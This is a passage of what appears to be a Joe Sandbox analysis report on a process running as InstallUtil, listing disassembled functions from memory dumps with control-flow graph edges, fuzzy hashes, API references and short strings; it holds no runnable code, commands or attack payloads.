                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_5eb0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e57ac6ca3bd2e4b57c9725c80595bf5d145b31398d1bf263b220d091d632dcc3
                                                                                                            • Instruction ID: 6fc1a0af10aeb1732f2c06baafab4a632e5a93bb3e6780666372157ba9b5474c
                                                                                                            • Opcode Fuzzy Hash: e57ac6ca3bd2e4b57c9725c80595bf5d145b31398d1bf263b220d091d632dcc3
                                                                                                            • Instruction Fuzzy Hash: 1D227270A002098FFF24DB68D880BFEB7BAFB45315F209926E495EB391D675DC818B51
                                                                                                            Function 05EB6780 Relevance: .5, Instructions: 545COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 3671 5eb6780-5eb67a1 3672 5eb67a3-5eb67a6 3671->3672 3673 5eb67a8-5eb67c7 3672->3673 3674 5eb67cc-5eb67cf 3672->3674 3673->3674 3675 5eb6f70-5eb6f72 3674->3675 3676 5eb67d5-5eb67f4 3674->3676 3677 5eb6f79-5eb6f7c 3675->3677 3678 5eb6f74 3675->3678 3684 5eb680d-5eb6817 3676->3684 3685 5eb67f6-5eb67f9 3676->3685 3677->3672 3681 5eb6f82-5eb6f8b 3677->3681 3678->3677 3689 5eb681d-5eb682c 3684->3689 3685->3684 3686 5eb67fb-5eb680b 3685->3686 3686->3689 3797 5eb682e call 5eb6f98 3689->3797 3798 5eb682e call 5eb6fa0 3689->3798 3690 5eb6833-5eb6838 3691 5eb683a-5eb6840 3690->3691 3692 5eb6845-5eb6b22 3690->3692 3691->3681 3713 5eb6b28-5eb6bd7 3692->3713 3714 5eb6f62-5eb6f6f 3692->3714 3723 5eb6bd9-5eb6bfe 3713->3723 3724 5eb6c00 3713->3724 3725 5eb6c09-5eb6c1c 3723->3725 3724->3725 3728 5eb6f49-5eb6f55 3725->3728 3729 5eb6c22-5eb6c44 3725->3729 3728->3713 3730 5eb6f5b 3728->3730 3729->3728 3732 5eb6c4a-5eb6c54 3729->3732 3730->3714 3732->3728 3733 5eb6c5a-5eb6c65 3732->3733 3733->3728 3734 5eb6c6b-5eb6d41 3733->3734 3746 5eb6d4f-5eb6d7f 3734->3746 3747 5eb6d43-5eb6d45 3734->3747 3751 5eb6d8d-5eb6d99 3746->3751 3752 5eb6d81-5eb6d83 3746->3752 3747->3746 3753 5eb6d9b-5eb6d9f 3751->3753 3754 5eb6df9-5eb6dfd 3751->3754 3752->3751 3753->3754 3757 5eb6da1-5eb6dcb 3753->3757 3755 5eb6f3a-5eb6f43 3754->3755 3756 5eb6e03-5eb6e3f 3754->3756 3755->3728 3755->3734 3767 5eb6e4d-5eb6e5b 3756->3767 3768 5eb6e41-5eb6e43 3756->3768 3764 5eb6dd9-5eb6df6 3757->3764 3765 5eb6dcd-5eb6dcf 3757->3765 3764->3754 3765->3764 3771 5eb6e5d-5eb6e68 3767->3771 3772 5eb6e72-5eb6e7d 3767->3772 3768->3767 3771->3772 3775 5eb6e6a 3771->3775 3776 5eb6e7f-5eb6e85 3772->3776 3777 5eb6e95-5eb6ea6 3772->3777 3775->3772 3778 5eb6e89-5eb6e8b 3776->3778 3779 5eb6e87 3776->3779 3781 5eb6ea8-5eb6eae 3777->3781 3782 5eb6ebe-5eb6eca 3777->3782 3778->3777 3779->3777 3783 5eb6eb2-5eb6eb4 3781->3783 3784 5eb6eb0 3781->3784 3786 5eb6ecc-5eb6ed2 3782->3786 3787 5eb6ee2-5eb6f33 3782->3787 3783->3782 3784->3782 3788 5eb6ed6-5eb6ed8 3786->3788 3789 5eb6ed4 3786->3789 3787->3755 3788->3787 3789->3787 3797->3690 3798->3690
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2433408673.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_5eb0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0d17f7b445e6e547285c5b6357f6c71730abb5b3cc9291318cae9db327cd37a3
                                                                                                            • Instruction ID: b0953eb0f88f167b354d649166228a2cf4c574d16253b5632dcebc2442bcbb9f
                                                                                                            • Opcode Fuzzy Hash: 0d17f7b445e6e547285c5b6357f6c71730abb5b3cc9291318cae9db327cd37a3
                                                                                                            • Instruction Fuzzy Hash: 21322031E1071ACBDB14EF75C8945DEB7B6FF89300F10D6AAD449AB254EB70A985CB80
                                                                                                            Function 05EBB4A8 Relevance: .5, Instructions: 474COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 3799 5ebb4a8-5ebb4c6 3800 5ebb4c8-5ebb4cb 3799->3800 3801 5ebb4cd-5ebb4e7 3800->3801 3802 5ebb4ec-5ebb4ef 3800->3802 3801->3802 3803 5ebb4f1-5ebb4ff 3802->3803 3804 5ebb506-5ebb509 3802->3804 3811 5ebb54e-5ebb564 3803->3811 3812 5ebb501 3803->3812 3805 5ebb50b-5ebb527 3804->3805 3806 5ebb52c-5ebb52f 3804->3806 3805->3806 3808 5ebb53c-5ebb53e 3806->3808 3809 5ebb531-5ebb53b 3806->3809 3814 5ebb540 3808->3814 3815 5ebb545-5ebb548 3808->3815 3819 5ebb56a-5ebb573 3811->3819 3820 5ebb77f-5ebb782 3811->3820 3812->3804 3814->3815 3815->3800 3815->3811 3821 5ebb78a-5ebb795 3819->3821 3822 5ebb579-5ebb596 3819->3822 3823 5ebb783-5ebb789 3820->3823 3821->3823 3826 5ebb797-5ebb7bf 3821->3826 3829 5ebb76c-5ebb779 3822->3829 3830 5ebb59c-5ebb5c4 3822->3830 3828 5ebb7c1-5ebb7c4 3826->3828 3831 5ebb7e7-5ebb7ea 3828->3831 3832 5ebb7c6-5ebb7e2 3828->3832 3829->3819 3829->3820 3830->3829 3854 5ebb5ca-5ebb5d3 3830->3854 3833 5ebb7f0-5ebb7fc 3831->3833 3834 5ebb897-5ebb89a 3831->3834 3832->3831 3839 5ebb807-5ebb809 3833->3839 3835 5ebbacf-5ebbad1 3834->3835 3836 5ebb8a0-5ebb8af 3834->3836 3840 5ebbad8-5ebbadb 3835->3840 3841 5ebbad3 3835->3841 3852 5ebb8ce-5ebb912 3836->3852 3853 5ebb8b1-5ebb8cc 3836->3853 3842 5ebb80b-5ebb811 3839->3842 3843 5ebb821-5ebb825 3839->3843 3840->3828 3846 5ebbae1-5ebbaea 3840->3846 3841->3840 3848 5ebb813 3842->3848 3849 5ebb815-5ebb817 3842->3849 3850 5ebb833 3843->3850 3851 5ebb827-5ebb831 3843->3851 3848->3843 3849->3843 3855 5ebb838-5ebb83a 3850->3855 3851->3855 3861 5ebb918-5ebb929 3852->3861 3862 5ebbaa3-5ebbab8 3852->3862 3853->3852 3854->3821 3856 5ebb5d9-5ebb5f5 3854->3856 3858 5ebb83c-5ebb83f 3855->3858 3859 5ebb851-5ebb88a 3855->3859 3867 5ebb5fb-5ebb625 3856->3867 3868 5ebb75a-5ebb766 3856->3868 3858->3846 3859->3836 3881 5ebb88c-5ebb896 3859->3881 3872 5ebb92f-5ebb94c 3861->3872 3873 5ebba8e-5ebba9d 3861->3873 3862->3835 3882 5ebb62b-5ebb653 3867->3882 3883 5ebb750-5ebb755 3867->3883 3868->3829 3868->3854 3872->3873 3884 5ebb952-5ebba48 call 5eb98c0 3872->3884 3873->3861 3873->3862 3882->3883 3890 5ebb659-5ebb687 3882->3890 3883->3868 3933 5ebba4a-5ebba54 3884->3933 3934 5ebba56 3884->3934 3890->3883 3896 5ebb68d-5ebb696 3890->3896 3896->3883 3897 5ebb69c-5ebb6ce 3896->3897 3904 5ebb6d9-5ebb6f5 3897->3904 3905 5ebb6d0-5ebb6d4 3897->3905 3904->3868 3908 5ebb6f7-5ebb74e call 5eb98c0 3904->3908 3905->3883 3907 5ebb6d6 3905->3907 3907->3904 3908->3868 3935 5ebba5b-5ebba5d 3933->3935 3934->3935 3935->3873 3936 5ebba5f-5ebba64 3935->3936 3937 5ebba72 3936->3937 3938 5ebba66-5ebba70 3936->3938 3939 5ebba77-5ebba79 3937->3939 3938->3939 3939->3873 3940 5ebba7b-5ebba87 3939->3940 3940->3873
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2433408673.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_5eb0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e4900163587e48eef1e21fce84b2eadf59b49df19e941ef175927fd2b7431c5f
                                                                                                            • Instruction ID: 32f2ac5fe943f5e323f603bbc93c7e515681b06203fddec76289b16154c184e1
                                                                                                            • Opcode Fuzzy Hash: e4900163587e48eef1e21fce84b2eadf59b49df19e941ef175927fd2b7431c5f
                                                                                                            • Instruction Fuzzy Hash: 9B02BE30B00216CFEB14DB78D894AAEB7A6FF84305F208569D456DB355EB75EC42CB81
                                                                                                            Function 00C44AC0 Relevance: .3, Instructions: 266COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2415579357.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_c40000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bc1309da6426d7df3939c2d5bd2821b1a5efbb7629ca7e4c75aecd8695190ef0
                                                                                                            • Instruction ID: db582af323eb4b3e4675d9500f32aeb3fb67b82d4be9b0208c17a14f8b2a2c6d
                                                                                                            • Opcode Fuzzy Hash: bc1309da6426d7df3939c2d5bd2821b1a5efbb7629ca7e4c75aecd8695190ef0
                                                                                                            • Instruction Fuzzy Hash: 06B15F70E00609CFDF18CFA9D8917ADBBF2BF88714F248529D825EB254EB749945CB81
                                                                                                            Function 00C44838 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 502 c44838-c448c4 505 c448c6-c448d1 502->505 506 c4490e-c44910 502->506 505->506 508 c448d3-c448df 505->508 507 c44912-c4492a 506->507 515 c44974-c44976 507->515 516 c4492c-c44937 507->516 509 c448e1-c448eb 508->509 510 c44902-c4490c 508->510 512 c448ed 509->512 513 c448ef-c448fe 509->513 510->507 512->513 513->513 514 c44900 513->514 514->510 518 c44978-c449bd 515->518 516->515 517 c44939-c44945 516->517 519 c44947-c44951 517->519 520 c44968-c44972 517->520 526 c449c3-c449d1 518->526 521 c44955-c44964 519->521 522 c44953 519->522 520->518 521->521 524 c44966 521->524 522->521 524->520 527 c449d3-c449d9 526->527 528 c449da-c44a37 526->528 527->528 535 c44a47-c44a4b 528->535 536 c44a39-c44a3d 528->536 538 c44a4d-c44a51 535->538 539 c44a5b-c44a5f 535->539 536->535 537 c44a3f-c44a42 call c40ab0 536->537 537->535 538->539 541 c44a53-c44a56 call c40ab0 538->541 542 c44a61-c44a65 539->542 543 c44a6f-c44a73 539->543 541->539 542->543 545 c44a67 542->545 546 c44a75-c44a79 543->546 547 c44a83 543->547 545->543 546->547 548 c44a7b 546->548 549 c44a84 547->549 548->547 549->549
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2415579357.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_c40000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Vik$\Vik
                                                                                                            • API String ID: 0-785361344
                                                                                                            • Opcode ID: 0bd40bb58704f452f9097262a762fa43b94d7b47a889b8ff73e3094010e7dfba
                                                                                                            • Instruction ID: 5ae28124744f286a74254c171fe5c36e2dfb8415449d71835f4e53830c733dcb
                                                                                                            • Opcode Fuzzy Hash: 0bd40bb58704f452f9097262a762fa43b94d7b47a889b8ff73e3094010e7dfba
                                                                                                            • Instruction Fuzzy Hash: 01717D70E00249CFDF18DFA9D8817DEBBF6BF88710F248129E425AB254DB749942DB85
                                                                                                            Function 00C4482F Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 550 c4482f-c448c4 553 c448c6-c448d1 550->553 554 c4490e-c44910 550->554 553->554 556 c448d3-c448df 553->556 555 c44912-c4492a 554->555 563 c44974-c44976 555->563 564 c4492c-c44937 555->564 557 c448e1-c448eb 556->557 558 c44902-c4490c 556->558 560 c448ed 557->560 561 c448ef-c448fe 557->561 558->555 560->561 561->561 562 c44900 561->562 562->558 566 c44978-c4498a 563->566 564->563 565 c44939-c44945 564->565 567 c44947-c44951 565->567 568 c44968-c44972 565->568 573 c44991-c449bd 566->573 569 c44955-c44964 567->569 570 c44953 567->570 568->566 569->569 572 c44966 569->572 570->569 572->568 574 c449c3-c449d1 573->574 575 c449d3-c449d9 574->575 576 c449da-c44a37 574->576 575->576 583 c44a47-c44a4b 576->583 584 c44a39-c44a3d 576->584 586 c44a4d-c44a51 583->586 587 c44a5b-c44a5f 583->587 584->583 585 c44a3f-c44a42 call c40ab0 584->585 585->583 586->587 589 c44a53-c44a56 call c40ab0 586->589 590 c44a61-c44a65 587->590 591 c44a6f-c44a73 587->591 589->587 590->591 593 c44a67 590->593 594 c44a75-c44a79 591->594 595 c44a83 591->595 593->591 594->595 596 c44a7b 594->596 597 c44a84 595->597 596->595 597->597
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2415579357.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_c40000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Vik$\Vik
                                                                                                            • API String ID: 0-785361344
                                                                                                            • Opcode ID: dc4b7e9051c754c65982ca73a2df59ce0ceec53381798a06bb0090793d22c9e6
                                                                                                            • Instruction ID: 4642be75d531aa589f95b1d66396c71807fd555b744c5405b318c24cd7bb2f27
                                                                                                            • Opcode Fuzzy Hash: dc4b7e9051c754c65982ca73a2df59ce0ceec53381798a06bb0090793d22c9e6
                                                                                                            • Instruction Fuzzy Hash: D5717D70D00249CFDF14DFA9D8817DEBBF5BF88710F248129E424AB254DB749942DB85
                                                                                                            Function 066C0C70 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1185 66c0c70-66c0cac 1186 66c0d5c-66c0d7c 1185->1186 1187 66c0cb2-66c0cb7 1185->1187 1194 66c0d7f-66c0d8c 1186->1194 1188 66c0cb9-66c0cf0 1187->1188 1189 66c0d0a-66c0d42 CallWindowProcW 1187->1189 1196 66c0cf9-66c0d08 1188->1196 1197 66c0cf2-66c0cf8 1188->1197 1191 66c0d4b-66c0d5a 1189->1191 1192 66c0d44-66c0d4a 1189->1192 1191->1194 1192->1191 1196->1194 1197->1196
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 066C0D31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2434388737.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_66c0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 58b71b827919a09065e04a96c1346e59ca2b394a438ed9493769c7ac4ff55a82
                                                                                                            • Instruction ID: c3cfdf6542faafca0d007fabbc4681ce07ad1a37d53faa1943e632f4d56731f5
                                                                                                            • Opcode Fuzzy Hash: 58b71b827919a09065e04a96c1346e59ca2b394a438ed9493769c7ac4ff55a82
                                                                                                            • Instruction Fuzzy Hash: 504109B4A00709CFDB54CF99C448AAABBF5FB88324F24C49DD519AB321D775A841CFA0
                                                                                                            Function 066C22F0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1199 66c22f0-66c321a OleInitialize 1201 66c321c-66c3222 1199->1201 1202 66c3223-66c3240 1199->1202 1201->1202
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 066C320D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2434388737.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_66c0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 251ca89dc8045df96a1fcdc849392f10344e43496632dc337709863e619f935a
                                                                                                            • Instruction ID: e99eea9714067171a76d12955e7eee05108bec9879dd57bf34e0daa7fd3b8d4e
                                                                                                            • Opcode Fuzzy Hash: 251ca89dc8045df96a1fcdc849392f10344e43496632dc337709863e619f935a
                                                                                                            • Instruction Fuzzy Hash: 881103B5804749CFDB60DF9AD544B9EFBF4EB48224F20845AD519B7300C379A944CFA5
                                                                                                            Function 066C31B1 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1205 66c31b1-66c31b3 1206 66c31b8-66c321a OleInitialize 1205->1206 1207 66c321c-66c3222 1206->1207 1208 66c3223-66c3240 1206->1208 1207->1208
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 066C320D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2434388737.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_66c0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: ee1b48ac6af2da350fc37dc5f2b51f312329420793e2f55c77cee4af443c41ec
                                                                                                            • Instruction ID: 1bf2bef85e81014bf974bd0effd46ea421013aae5b7b0ecea7cb8d5a7b5a1a3b
                                                                                                            • Opcode Fuzzy Hash: ee1b48ac6af2da350fc37dc5f2b51f312329420793e2f55c77cee4af443c41ec
                                                                                                            • Instruction Fuzzy Hash: AF1100B5800649CFDB20DF9AD984BDEBBF8EB48224F24845AD518B7300C379A544CFA5
                                                                                                            Function 00C441E7 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1291 c441e7-c441ea 1292 c441ec 1291->1292 1293 c441ee 1291->1293 1292->1293 1294 c441f0-c441f1 1293->1294 1295 c441f2-c44256 1293->1295 1294->1295 1297 c442a0-c442a2 1295->1297 1298 c44258-c44263 1295->1298 1300 c442a4-c442bd 1297->1300 1298->1297 1299 c44265-c44271 1298->1299 1301 c44294-c4429e 1299->1301 1302 c44273-c4427d 1299->1302 1306 c442bf-c442cb 1300->1306 1307 c44309-c4430b 1300->1307 1301->1300 1303 c44281-c44290 1302->1303 1304 c4427f 1302->1304 1303->1303 1308 c44292 1303->1308 1304->1303 1306->1307 1309 c442cd-c442d9 1306->1309 1310 c4430d-c44365 1307->1310 1308->1301 1311 c442fc-c44307 1309->1311 1312 c442db-c442e5 1309->1312 1319 c44367-c44372 1310->1319 1320 c443af-c443b1 1310->1320 1311->1310 1313 c442e7 1312->1313 1314 c442e9-c442f8 1312->1314 1313->1314 1314->1314 1316 c442fa 1314->1316 1316->1311 1319->1320 1321 c44374-c44380 1319->1321 1322 c443b3-c443cb 1320->1322 1323 c44382-c4438c 1321->1323 1324 c443a3-c443ad 1321->1324 1329 c44415-c44417 1322->1329 1330 c443cd-c443d8 1322->1330 1325 c44390-c4439f 1323->1325 1326 c4438e 1323->1326 1324->1322 1325->1325 1328 c443a1 1325->1328 1326->1325 1328->1324 1331 c44419-c4447e 1329->1331 1330->1329 1332 c443da-c443e6 1330->1332 1341 c44487-c444e7 1331->1341 1342 c44480-c44486 1331->1342 1333 c443e8-c443f2 1332->1333 1334 c44409-c44413 1332->1334 1336 c443f4 1333->1336 1337 c443f6-c44405 1333->1337 1334->1331 1336->1337 1337->1337 1338 c44407 1337->1338 1338->1334 1349 c444f7-c444fb 1341->1349 1350 c444e9-c444ed 1341->1350 1342->1341 1352 c444fd-c44501 1349->1352 1353 c4450b-c4450f 1349->1353 1350->1349 1351 c444ef 1350->1351 1351->1349 1352->1353 1354 c44503 1352->1354 1355 c44511-c44515 1353->1355 1356 c4451f-c44523 1353->1356 1354->1353 1355->1356 1357 c44517-c4451a call c40ab0 1355->1357 1358 c44525-c44529 1356->1358 1359 c44533-c44537 1356->1359 1357->1356 1358->1359 1360 c4452b-c4452e call c40ab0 1358->1360 1361 c44547-c4454b 1359->1361 1362 c44539-c4453d 1359->1362 1360->1359 1366 c4454d-c44551 1361->1366 1367 c4455b-c4455f 1361->1367 1362->1361 1365 c4453f-c44542 call c40ab0 1362->1365 1365->1361 1366->1367 1369 c44553 1366->1369 1370 c44561-c44565 1367->1370 1371 c4456f 1367->1371 1369->1367 1370->1371 1372 c44567 1370->1372 1373 c44570 1371->1373 1372->1371 1373->1373
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2415579357.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_c40000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Vik
                                                                                                            • API String ID: 0-2800833850
                                                                                                            • Opcode ID: 7ac92c0229eb007cf912a27067fbcb75a3840cfb0feca1666e30673ffe6f9a33
                                                                                                            • Instruction ID: 56ebd629300fa9cce75e50b966db51d878cb9623e685bd486742ce475413d800
                                                                                                            • Opcode Fuzzy Hash: 7ac92c0229eb007cf912a27067fbcb75a3840cfb0feca1666e30673ffe6f9a33
                                                                                                            • Instruction Fuzzy Hash: B6B12F70E00219CFDF14CFA9D8857EDBBF1BF88714F248129E815A7254EB749946CB91
                                                                                                            Function 00C43E9F Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1441 c43e9f-c43ea6 1442 c43ea8-c43ea9 1441->1442 1443 c43eaa-c43f0e 1441->1443 1442->1443 1445 c43f10-c43f1b 1443->1445 1446 c43f58-c43f5a 1443->1446 1445->1446 1447 c43f1d-c43f29 1445->1447 1448 c43f5c-c43fb4 1446->1448 1449 c43f4c-c43f56 1447->1449 1450 c43f2b-c43f35 1447->1450 1457 c43fb6-c43fc1 1448->1457 1458 c43ffe-c44000 1448->1458 1449->1448 1451 c43f37 1450->1451 1452 c43f39-c43f48 1450->1452 1451->1452 1452->1452 1454 c43f4a 1452->1454 1454->1449 1457->1458 1460 c43fc3-c43fcf 1457->1460 1459 c44002-c4401a 1458->1459 1467 c44064-c44066 1459->1467 1468 c4401c-c44027 1459->1468 1461 c43fd1-c43fdb 1460->1461 1462 c43ff2-c43ffc 1460->1462 1464 c43fdd 1461->1464 1465 c43fdf-c43fee 1461->1465 1462->1459 1464->1465 1465->1465 1466 c43ff0 1465->1466 1466->1462 1469 c44068-c4407a 1467->1469 1468->1467 1470 c44029-c44035 1468->1470 1477 c44081-c440b6 1469->1477 1471 c44037-c44041 1470->1471 1472 c44058-c44062 1470->1472 1473 c44045-c44054 1471->1473 1474 c44043 1471->1474 1472->1469 1473->1473 1476 c44056 1473->1476 1474->1473 1476->1472 1478 c440bc-c440ca 1477->1478 1479 c440d3-c44133 1478->1479 1480 c440cc-c440d2 1478->1480 1487 c44135-c44139 1479->1487 1488 c44143-c44147 1479->1488 1480->1479 1487->1488 1489 c4413b 1487->1489 1490 c44157-c4415b 1488->1490 1491 c44149-c4414d 1488->1491 1489->1488 1492 c4415d-c44161 1490->1492 1493 c4416b-c4416f 1490->1493 1491->1490 1494 c4414f-c44152 call c40ab0 1491->1494 1492->1493 1495 c44163-c44166 call c40ab0 1492->1495 1496 c44171-c44175 1493->1496 1497 c4417f-c44183 1493->1497 1494->1490 1495->1493 1496->1497 1500 c44177-c4417a call c40ab0 1496->1500 1501 c44185-c44189 1497->1501 1502 c44193-c44197 1497->1502 1500->1497 1501->1502 1504 c4418b 1501->1504 1505 c441a7 1502->1505 1506 c44199-c4419d 1502->1506 1504->1502 1508 c441a8 1505->1508 1506->1505 1507 c4419f 1506->1507 1507->1505 1508->1508
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2415579357.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_c40000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Vik
                                                                                                            • API String ID: 0-2800833850
                                                                                                            • Opcode ID: 01f493f4f44c06b29f231096bec349d8ea009a4781c52e6ce6d3467192d1313e
                                                                                                            • Instruction ID: 59dff901f30f21e68ead4d0bc54d91ee648de9006d8a0e0ed26cef4d57b89d2c
                                                                                                            • Opcode Fuzzy Hash: 01f493f4f44c06b29f231096bec349d8ea009a4781c52e6ce6d3467192d1313e
                                                                                                            • Instruction Fuzzy Hash: CF918E70E00249CFDF14CFA9D8857DEBBF2BF88714F248129E425AB254DB749985CB81
                                                                                                            Function 00C4E1A0 Relevance: .8, Instructions: 799COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2969 c4e1a0-c4e1bb 2970 c4e1bd-c4e1c0 2969->2970 2971 c4e1c2-c4e1de 2970->2971 2972 c4e1e3-c4e1e6 2970->2972 2971->2972 2973 c4e68c-c4e698 2972->2973 2974 c4e1ec-c4e1ef 2972->2974 2976 c4e69e-c4e98b 2973->2976 2977 c4e289-c4e298 2973->2977 2978 c4e1f1-c4e200 2974->2978 2979 c4e238-c4e23b 2974->2979 3183 c4e991-c4e997 2976->3183 3184 c4ebb2-c4ebbc 2976->3184 2984 c4e2a7-c4e2b3 2977->2984 2985 c4e29a-c4e29f 2977->2985 2982 c4e202-c4e207 2978->2982 2983 c4e20f-c4e21b 2978->2983 2980 c4e284-c4e287 2979->2980 2981 c4e23d-c4e27f 2979->2981 2980->2977 2990 c4e2d0-c4e2d3 2980->2990 2981->2980 2982->2983 2986 c4ebbd-c4ebf6 2983->2986 2991 c4e221-c4e233 call c401a0 2983->2991 2984->2986 2987 c4e2b9-c4e2cb call c401a0 2984->2987 2985->2984 3004 c4ebf8-c4ebfb 2986->3004 2987->2990 2994 c4e2d5-c4e317 2990->2994 2995 c4e31c-c4e31f 2990->2995 2991->2979 2994->2995 2997 c4e321-c4e363 2995->2997 2998 c4e368-c4e36b 2995->2998 2997->2998 3006 c4e3b4-c4e3b7 2998->3006 3007 c4e36d-c4e3af 2998->3007 3009 c4ebfd-c4ec19 3004->3009 3010 c4ec1e-c4ec21 3004->3010 3011 c4e3c6-c4e3c9 3006->3011 3012 c4e3b9-c4e3bb 3006->3012 3007->3006 3009->3010 3020 c4ec30-c4ec33 3010->3020 3021 c4ec23 call c4ed15 3010->3021 3018 c4e3e6-c4e3e9 3011->3018 3019 c4e3cb-c4e3e1 3011->3019 3016 c4e547-c4e550 3012->3016 3017 c4e3c1 3012->3017 3029 c4e552-c4e557 3016->3029 3030 c4e55f-c4e56b 3016->3030 3017->3011 3023 c4e3f8-c4e3fb 3018->3023 3024 c4e3eb-c4e3ed 3018->3024 3019->3018 3025 c4ec35-c4ec61 3020->3025 3026 c4ec66-c4ec68 3020->3026 3037 c4ec29-c4ec2b 3021->3037 3034 c4e444-c4e447 3023->3034 3035 c4e3fd-c4e43f 3023->3035 3032 c4e3f3 3024->3032 3033 c4e689 3024->3033 3025->3026 3039 c4ec6f-c4ec72 3026->3039 3040 c4ec6a 3026->3040 3029->3030 3042 c4e571-c4e585 call c40208 3030->3042 3043 c4e67c-c4e681 